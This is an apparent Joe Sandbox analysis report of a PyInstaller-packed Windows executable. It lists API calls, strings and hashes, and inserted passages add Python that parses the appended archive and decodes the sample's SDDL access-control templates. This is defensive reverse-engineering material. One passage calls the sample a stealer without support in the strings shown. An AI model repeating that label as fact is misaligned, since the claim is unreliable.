  • Part of subcall function 00007FF6B7508830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B7508889
  • Part of subcall function 00007FF6B7518238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B7518251
  • Part of subcall function 00007FF6B7502810: MessageBoxW.USER32 ref: 00007FF6B75028EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
• Instruction ID: 0451fa2114ab74bd34c4994a820669fee330068cecfac1ec0c0dd47de738734d
• Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
• Instruction Fuzzy Hash: 04418B13A1DA5244FA24AB69A8556F91390AF887C8F800131EF0DD7BFAEE3CF546C600

Control-flow Graph
Function 7ff6b7501210-7ff6b750146d (rendered graph not reproduced; basic-block edge list omitted). Subcalls: 7ff6b750bd80, 7ff6b7502710, 7ff6b7514f44, 7ff6b7514f08, 7ff6b7502910, 7ff6b750ba60, 7ff6b7514f30, 7ff6b751039c, 7ff6b7510110, 7ff6b750a1c0, 7ff6b7510adc, 7ff6b7529e30.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
• Instruction ID: 7f9a54e1071fe5532483c2daa4c48b6f1c9070b51bd920409945892258ffb7f6
• Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
• Instruction Fuzzy Hash: CA51B123A0C68685EA61AB1AA4403BE6391FF84798F484135EF4DC7BF5EE3CE546C700
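The string and API sets of the three function records above (the MEI cookie and TOC read with fread/fseek/calloc, the fopen/fread/fwrite extraction loop at 7ff6b7501600, and the inflateInit()-based decompression at 7ff6b7501210) are those of a self-extracting Python loader unpacking an archive appended to its own executable. The following Python is an added worked example, not code from this report or from the analysed sample; it assumes the PyInstaller CArchive layout (trailing 88-byte cookie, a TOC of 18-byte entry headers followed by NUL-terminated names, zlib-compressed entries) and parses a sample archive that is constructed inline. The entry names and payloads in SAMPLE_ENTRIES are illustrative.

```python
"""Reader for the appended archive whose loader strings (MEI cookie, TOC,
inflateInit, fopen/fwrite) appear in the function records above.
Added example; the layout is assumed to be the PyInstaller CArchive format.
The sample archive is constructed inline and is not taken from the sample."""
import struct
import zlib

MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"             # 8-byte cookie magic
COOKIE_FMT = "!8sIIii64s"                      # magic, pkg_len, toc_off, toc_len, pyver, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)      # 88 bytes, sits at the very end of the file
TOC_HEAD_FMT = "!iIIIBc"                       # entry_len, data_off, cdata_len, udata_len, compressed, type
TOC_HEAD_SIZE = struct.calcsize(TOC_HEAD_FMT)  # 18 bytes, followed by the NUL-terminated entry name

# Constructed sample entries (name, type code, payload, compress?); illustrative only.
SAMPLE_ENTRIES = [
    ("stub_loader", b"s", b"print('hello')", True),
    ("python311.dll", b"b", b"MZ" + b"\x90" * 62, False),
]


def build_archive(entries, pyver=311, pylib=b"python311.dll"):
    """Lay the archive out as the writer side does: data blobs, then the TOC,
    then the trailing cookie. TOC offsets are relative to the archive start,
    not to the start of the file, so the reader must derive that start."""
    data, toc = bytearray(), bytearray()
    for name, typecode, payload, compress in entries:
        blob = zlib.compress(payload, 9) if compress else payload
        name_b = name.encode("utf-8") + b"\0"
        name_b += b"\0" * ((-(TOC_HEAD_SIZE + len(name_b))) % 16)   # pad entry to 16 bytes
        entry_len = TOC_HEAD_SIZE + len(name_b)
        toc += struct.pack(TOC_HEAD_FMT, entry_len, len(data), len(blob),
                           len(payload), int(compress), typecode)
        toc += name_b
        data += blob
    pkg_len = len(data) + len(toc) + COOKIE_SIZE        # the cookie counts toward pkg_len
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), pyver, pylib)
    stub = b"MZ" + b"\0" * 254                           # stand-in for the bootloader PE image
    return stub + bytes(data) + bytes(toc) + cookie


def parse_archive(buf):
    """Locate the trailing cookie, derive the archive start from pkg_len and
    decode every TOC entry. rfind() picks the last occurrence, so a copy of
    the magic inside entry data cannot be mistaken for the cookie."""
    cookie_pos = buf.rfind(MAGIC)
    if cookie_pos < 0 or cookie_pos + COOKIE_SIZE > len(buf):
        raise ValueError("Failed to read cookie!")
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, buf[cookie_pos:cookie_pos + COOKIE_SIZE])
    archive_start = cookie_pos + COOKIE_SIZE - pkg_len
    if archive_start < 0 or toc_off + toc_len > pkg_len:
        raise ValueError("Failed to seek to cookie position!")
    toc = buf[archive_start + toc_off:archive_start + toc_off + toc_len]
    if len(toc) != toc_len:
        raise ValueError("Could not read full TOC!")
    entries, pos = [], 0
    while pos < len(toc):
        head = toc[pos:pos + TOC_HEAD_SIZE]
        if len(head) < TOC_HEAD_SIZE:
            raise ValueError("Could not read full TOC!")
        entry_len, data_off, cdata_len, udata_len, compressed, typecode = struct.unpack(
            TOC_HEAD_FMT, head)
        # A crafted entry_len must not let the loop walk outside the TOC buffer.
        if entry_len < TOC_HEAD_SIZE or pos + entry_len > len(toc):
            raise ValueError("malformed TOC entry at offset %d" % pos)
        name = toc[pos + TOC_HEAD_SIZE:pos + entry_len].split(b"\0", 1)[0].decode("utf-8")
        entries.append({"name": name, "type": typecode, "data_off": data_off,
                        "cdata_len": cdata_len, "udata_len": udata_len,
                        "compressed": bool(compressed)})
        pos += entry_len
    return {"archive_start": archive_start, "pyver": pyver,
            "pylib": pylib.rstrip(b"\0").decode("utf-8"), "entries": entries}


def extract_entry(buf, archive, entry):
    """Return one entry's payload, inflating it when the TOC marks it as
    compressed (the inflateInit()/inflate path of the 7ff6b7501210 record)."""
    start = archive["archive_start"] + entry["data_off"]
    blob = buf[start:start + entry["cdata_len"]]
    if len(blob) != entry["cdata_len"]:
        raise ValueError("Failed to extract %s: failed to read data chunk!" % entry["name"])
    if entry["compressed"]:
        blob = zlib.decompress(blob)
    if len(blob) != entry["udata_len"]:
        raise ValueError("Failed to extract %s: size mismatch" % entry["name"])
    return blob


if __name__ == "__main__":
    sample = build_archive(SAMPLE_ENTRIES)
    info = parse_archive(sample)
    for e in info["entries"]:
        print(e["name"], e["type"], len(extract_entry(sample, info, e)), "bytes")
```

Parsing the TOC offline is how the embedded Python payload of a dropper like this is pulled out for analysis without running it; the bounds checks on entry_len and on the TOC slice are the parts to keep when pointing the reader at real samples, since a hostile archive must not be able to steer it outside its buffer.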

Control-flow Graph
(rendered graph not reproduced)
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF6B751F0AA,?,?,-00000018,00007FF6B751AD53,?,?,?,00007FF6B751AC4A,?,?,?,00007FF6B7515F3E), ref: 00007FF6B751EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF6B751F0AA,?,?,-00000018,00007FF6B751AD53,?,?,?,00007FF6B751AC4A,?,?,?,00007FF6B7515F3E), ref: 00007FF6B751EE98
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction ID: 1a252455fc8a62a46ca0f6c63a2c6b021a8bc9698c9119a396aa3725651b37a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE41C763B1DA2245EA15DF1A98106752391BF49B92F89863DDF1DC7BB4EF3CE4858300

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6B7503804), ref: 00007FF6B75036E1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B7503804), ref: 00007FF6B75036EB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502C9E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502D63
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: MessageBoxW.USER32 ref: 00007FF6B7502D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction ID: d60e2cf233a9c2584f606a4fd9246dd198f0468a1ff550510e47011322249933
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3214F63F1C64251FB219B2CE8153B62350BF99358F804136E75EC65F6EE2CE604C744

                                                                                                                                                                                                                                              Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
• Instruction ID: 43c8f9c447001a8a1015abfabceffc146aa3ecb77f293aab244723419772810e
• Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
• Instruction Fuzzy Hash: D3C1C123A0C6A792E6619F1D94402BD3BA0FB81F91F554235EB8E83BB1CE7CE8458700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
• Instruction ID: c57e1a10fdde354a7423a654366036f6bc738cf8d5e9c1db24e7c3ad9794fc4e
• Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
• Instruction Fuzzy Hash: 31216237A0C68242EB108B59F544A7AA3B0FF957A4F500235EBAD93BF4EE7CE4458700

Control-flow Graph

APIs
  • Part of subcall function 00007FF6B7508570: GetCurrentProcess.KERNEL32 ref: 00007FF6B7508590
  • Part of subcall function 00007FF6B7508570: OpenProcessToken.ADVAPI32 ref: 00007FF6B75085A3
  • Part of subcall function 00007FF6B7508570: GetTokenInformation.KERNELBASE ref: 00007FF6B75085C8
  • Part of subcall function 00007FF6B7508570: GetLastError.KERNEL32 ref: 00007FF6B75085D2
  • Part of subcall function 00007FF6B7508570: GetTokenInformation.KERNELBASE ref: 00007FF6B7508612
  • Part of subcall function 00007FF6B7508570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B750862E
  • Part of subcall function 00007FF6B7508570: CloseHandle.KERNEL32 ref: 00007FF6B7508646
• LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B750916C
• LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B7509175
Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                              • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                              • Instruction ID: b448f9862ad4b2578966b4992cc4363d812fab8a517ea80ecd4279cba33f4c89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE212D72A0CB8295F650AB14E5156EA6361FF88784F444036EB4DD37E6DF3CE9458780
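The string block above pairs two SDDL templates, `D:(A;;FA;;;%s)` and `D:(A;;FA;;;%s)(A;;FA;;;%s)`, with the well-known SID `S-1-3-4` (OWNER RIGHTS), an error message naming `PYI_PATH_MAX`, and token/security-descriptor imports (OpenProcessToken, GetTokenInformation, ConvertSidToStringSid, ConvertStringSecurityDescriptorToSecurityDescriptor, LocalFree). Read together, this is a routine that formats the current user's SID into a DACL granting full file access; the `PYI_` prefix matches the PyInstaller bootloader, which is consistent with a Python-based stealer packaged with PyInstaller. The following Python is an added example, not code from the report or from the sample: a small SDDL DACL parser plus the template rendering, so an analyst can decode exactly what a descriptor like this grants. The user SID is constructed, and the 4096-character cap is an assumed stand-in for `PYI_PATH_MAX`, whose value the page does not state.

```python
"""Decode SDDL DACL strings of the form seen in the sample's strings.

Added example; not part of the Joe Sandbox report or the analysed binary.
The two templates and the S-1-3-4 SID come from the page; the user SID and
the 4096 length cap (stand-in for PYI_PATH_MAX) are assumptions.
"""
import re

# SDDL ACE-type and access-right abbreviations (subset sufficient here).
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED"}
RIGHTS = {
    "FA": "FILE_ALL_ACCESS",
    "FR": "FILE_GENERIC_READ",
    "FW": "FILE_GENERIC_WRITE",
    "FX": "FILE_GENERIC_EXECUTE",
    "GA": "GENERIC_ALL",
    "GR": "GENERIC_READ",
    "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE",
}
# Well-known SIDs an analyst is likely to meet in a DACL like this one.
WELL_KNOWN_SIDS = {
    "S-1-3-4": "OWNER RIGHTS",
    "S-1-1-0": "Everyone",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}


def decode_rights(field):
    """Turn an ACE access-mask field into a list of right names.

    The field is either a hex mask (0x...) or a run of two-letter codes.
    """
    if field.startswith("0x"):
        return [f"MASK_{int(field, 16):#010x}"]
    if len(field) % 2:
        raise ValueError(f"malformed rights field: {field!r}")
    return [RIGHTS.get(field[i:i + 2], field[i:i + 2])
            for i in range(0, len(field), 2)]


def parse_dacl(sddl):
    """Parse 'D:<flags>(ace)(ace)...' into DACL flags and a list of ACEs."""
    if not sddl.startswith("D:"):
        raise ValueError("expected an SDDL string starting with 'D:'")
    body = sddl[2:]
    first = body.find("(")
    flags = body if first < 0 else body[:first]
    aces_text = "" if first < 0 else body[first:]
    # Everything after the flags must be a sequence of parenthesised ACEs.
    if not re.fullmatch(r"(?:\([^()]*\))*", aces_text):
        raise ValueError("malformed ACE list")
    aces = []
    for inner in re.findall(r"\(([^()]*)\)", aces_text):
        fields = inner.split(";")
        if len(fields) != 6:
            raise ValueError(f"ACE must have 6 fields: ({inner})")
        ace_type, ace_flags, rights, _object_guid, _inherit_guid, sid = fields
        if ace_type not in ACE_TYPES:
            raise ValueError(f"unsupported ACE type: {ace_type!r}")
        aces.append({
            "type": ACE_TYPES[ace_type],
            "flags": ace_flags,
            "rights": decode_rights(rights),
            "sid": sid,
            "sid_name": WELL_KNOWN_SIDS.get(sid, "(account SID)"),
        })
    return {"dacl_flags": flags, "aces": aces}


def render_template(template, *sids, max_len=4096):
    """Fill the %s placeholders as the binary's sprintf-style call would,
    then enforce a length cap. 4096 is an ASSUMED value for PYI_PATH_MAX."""
    rendered = template % sids
    if len(rendered) > max_len:
        raise ValueError(
            "Security descriptor string length exceeds PYI_PATH_MAX!")
    return rendered


def describe(sddl):
    """One human-readable line per ACE."""
    return [f"{a['type']} {','.join(a['rights'])} to {a['sid']} ({a['sid_name']})"
            for a in parse_dacl(sddl)["aces"]]


if __name__ == "__main__":
    # Constructed user SID; S-1-3-4 is the OWNER RIGHTS SID from the page.
    user_sid = "S-1-5-21-1111111111-2222222222-3333333333-1001"
    sddl = render_template("D:(A;;FA;;;%s)(A;;FA;;;%s)", user_sid, "S-1-3-4")
    for line in describe(sddl):
        print(line)
```

Run stand-alone it prints two ACEs: full file access for the (constructed) user SID and for OWNER RIGHTS, which is what a bootloader needs so that the extracting user, and whoever later owns the files, can read and delete the temporary extraction directory.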
Control-flow Graph
• Legend: Executed / Not Executed
• Graph residue omitted: node and edge listing for the function at 7ff6b751cf60 (calls into 7ff6b751a814, 7ff6b751c320, 7ff6b752391c, 7ff6b75147c0, 7ff6b751ca18, 7ff6b751cc38, 7ff6b751cb1c, 7ff6b751c5a0, 7ff6b7514ec4, 7ff6b75239e8; imports WriteFile, GetConsoleMode, GetLastError).
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D07C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D107
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
• Instruction ID: 6d89d0196e781cbe9b536f63fc846c5fa44fd028449234b695db76210944b5d4
• Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
• Instruction Fuzzy Hash: 1191ADB3E1C76285F7609F6D94406BD2BA0AB44B89F544139DF0EA7EA4DF39E482D700
APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction ID: 0bb9fd529e0937b88cd4e6ffa7f4e000f86cc17932332b5b5c4e2bc2f5ff710c
• Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction Fuzzy Hash: 27418023E1C79283E7509F6495503696260FB947A5F109335EBAC83EE2EF7CA5E08740
APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction ID: c5f8044358c9d798c5894b463f45aa4f97b247633c3543ef5eb62a9e4030bf9b
• Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
• Instruction Fuzzy Hash: 77313A23E0C29745FA54AB6C94623F91791AF82388F44503AEB4ECB6F7DE2DB8059241
APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
• Instruction ID: 70e9a4f3ccd27b92af4afb585e400eb988e2a440b0c63785d9bcac6133a6a011
• Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
• Instruction Fuzzy Hash: A7D09E12F0C79642FB142F785C5517812666F58B02F14143CDA8B867B3EE2CB84D8340
APIs
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
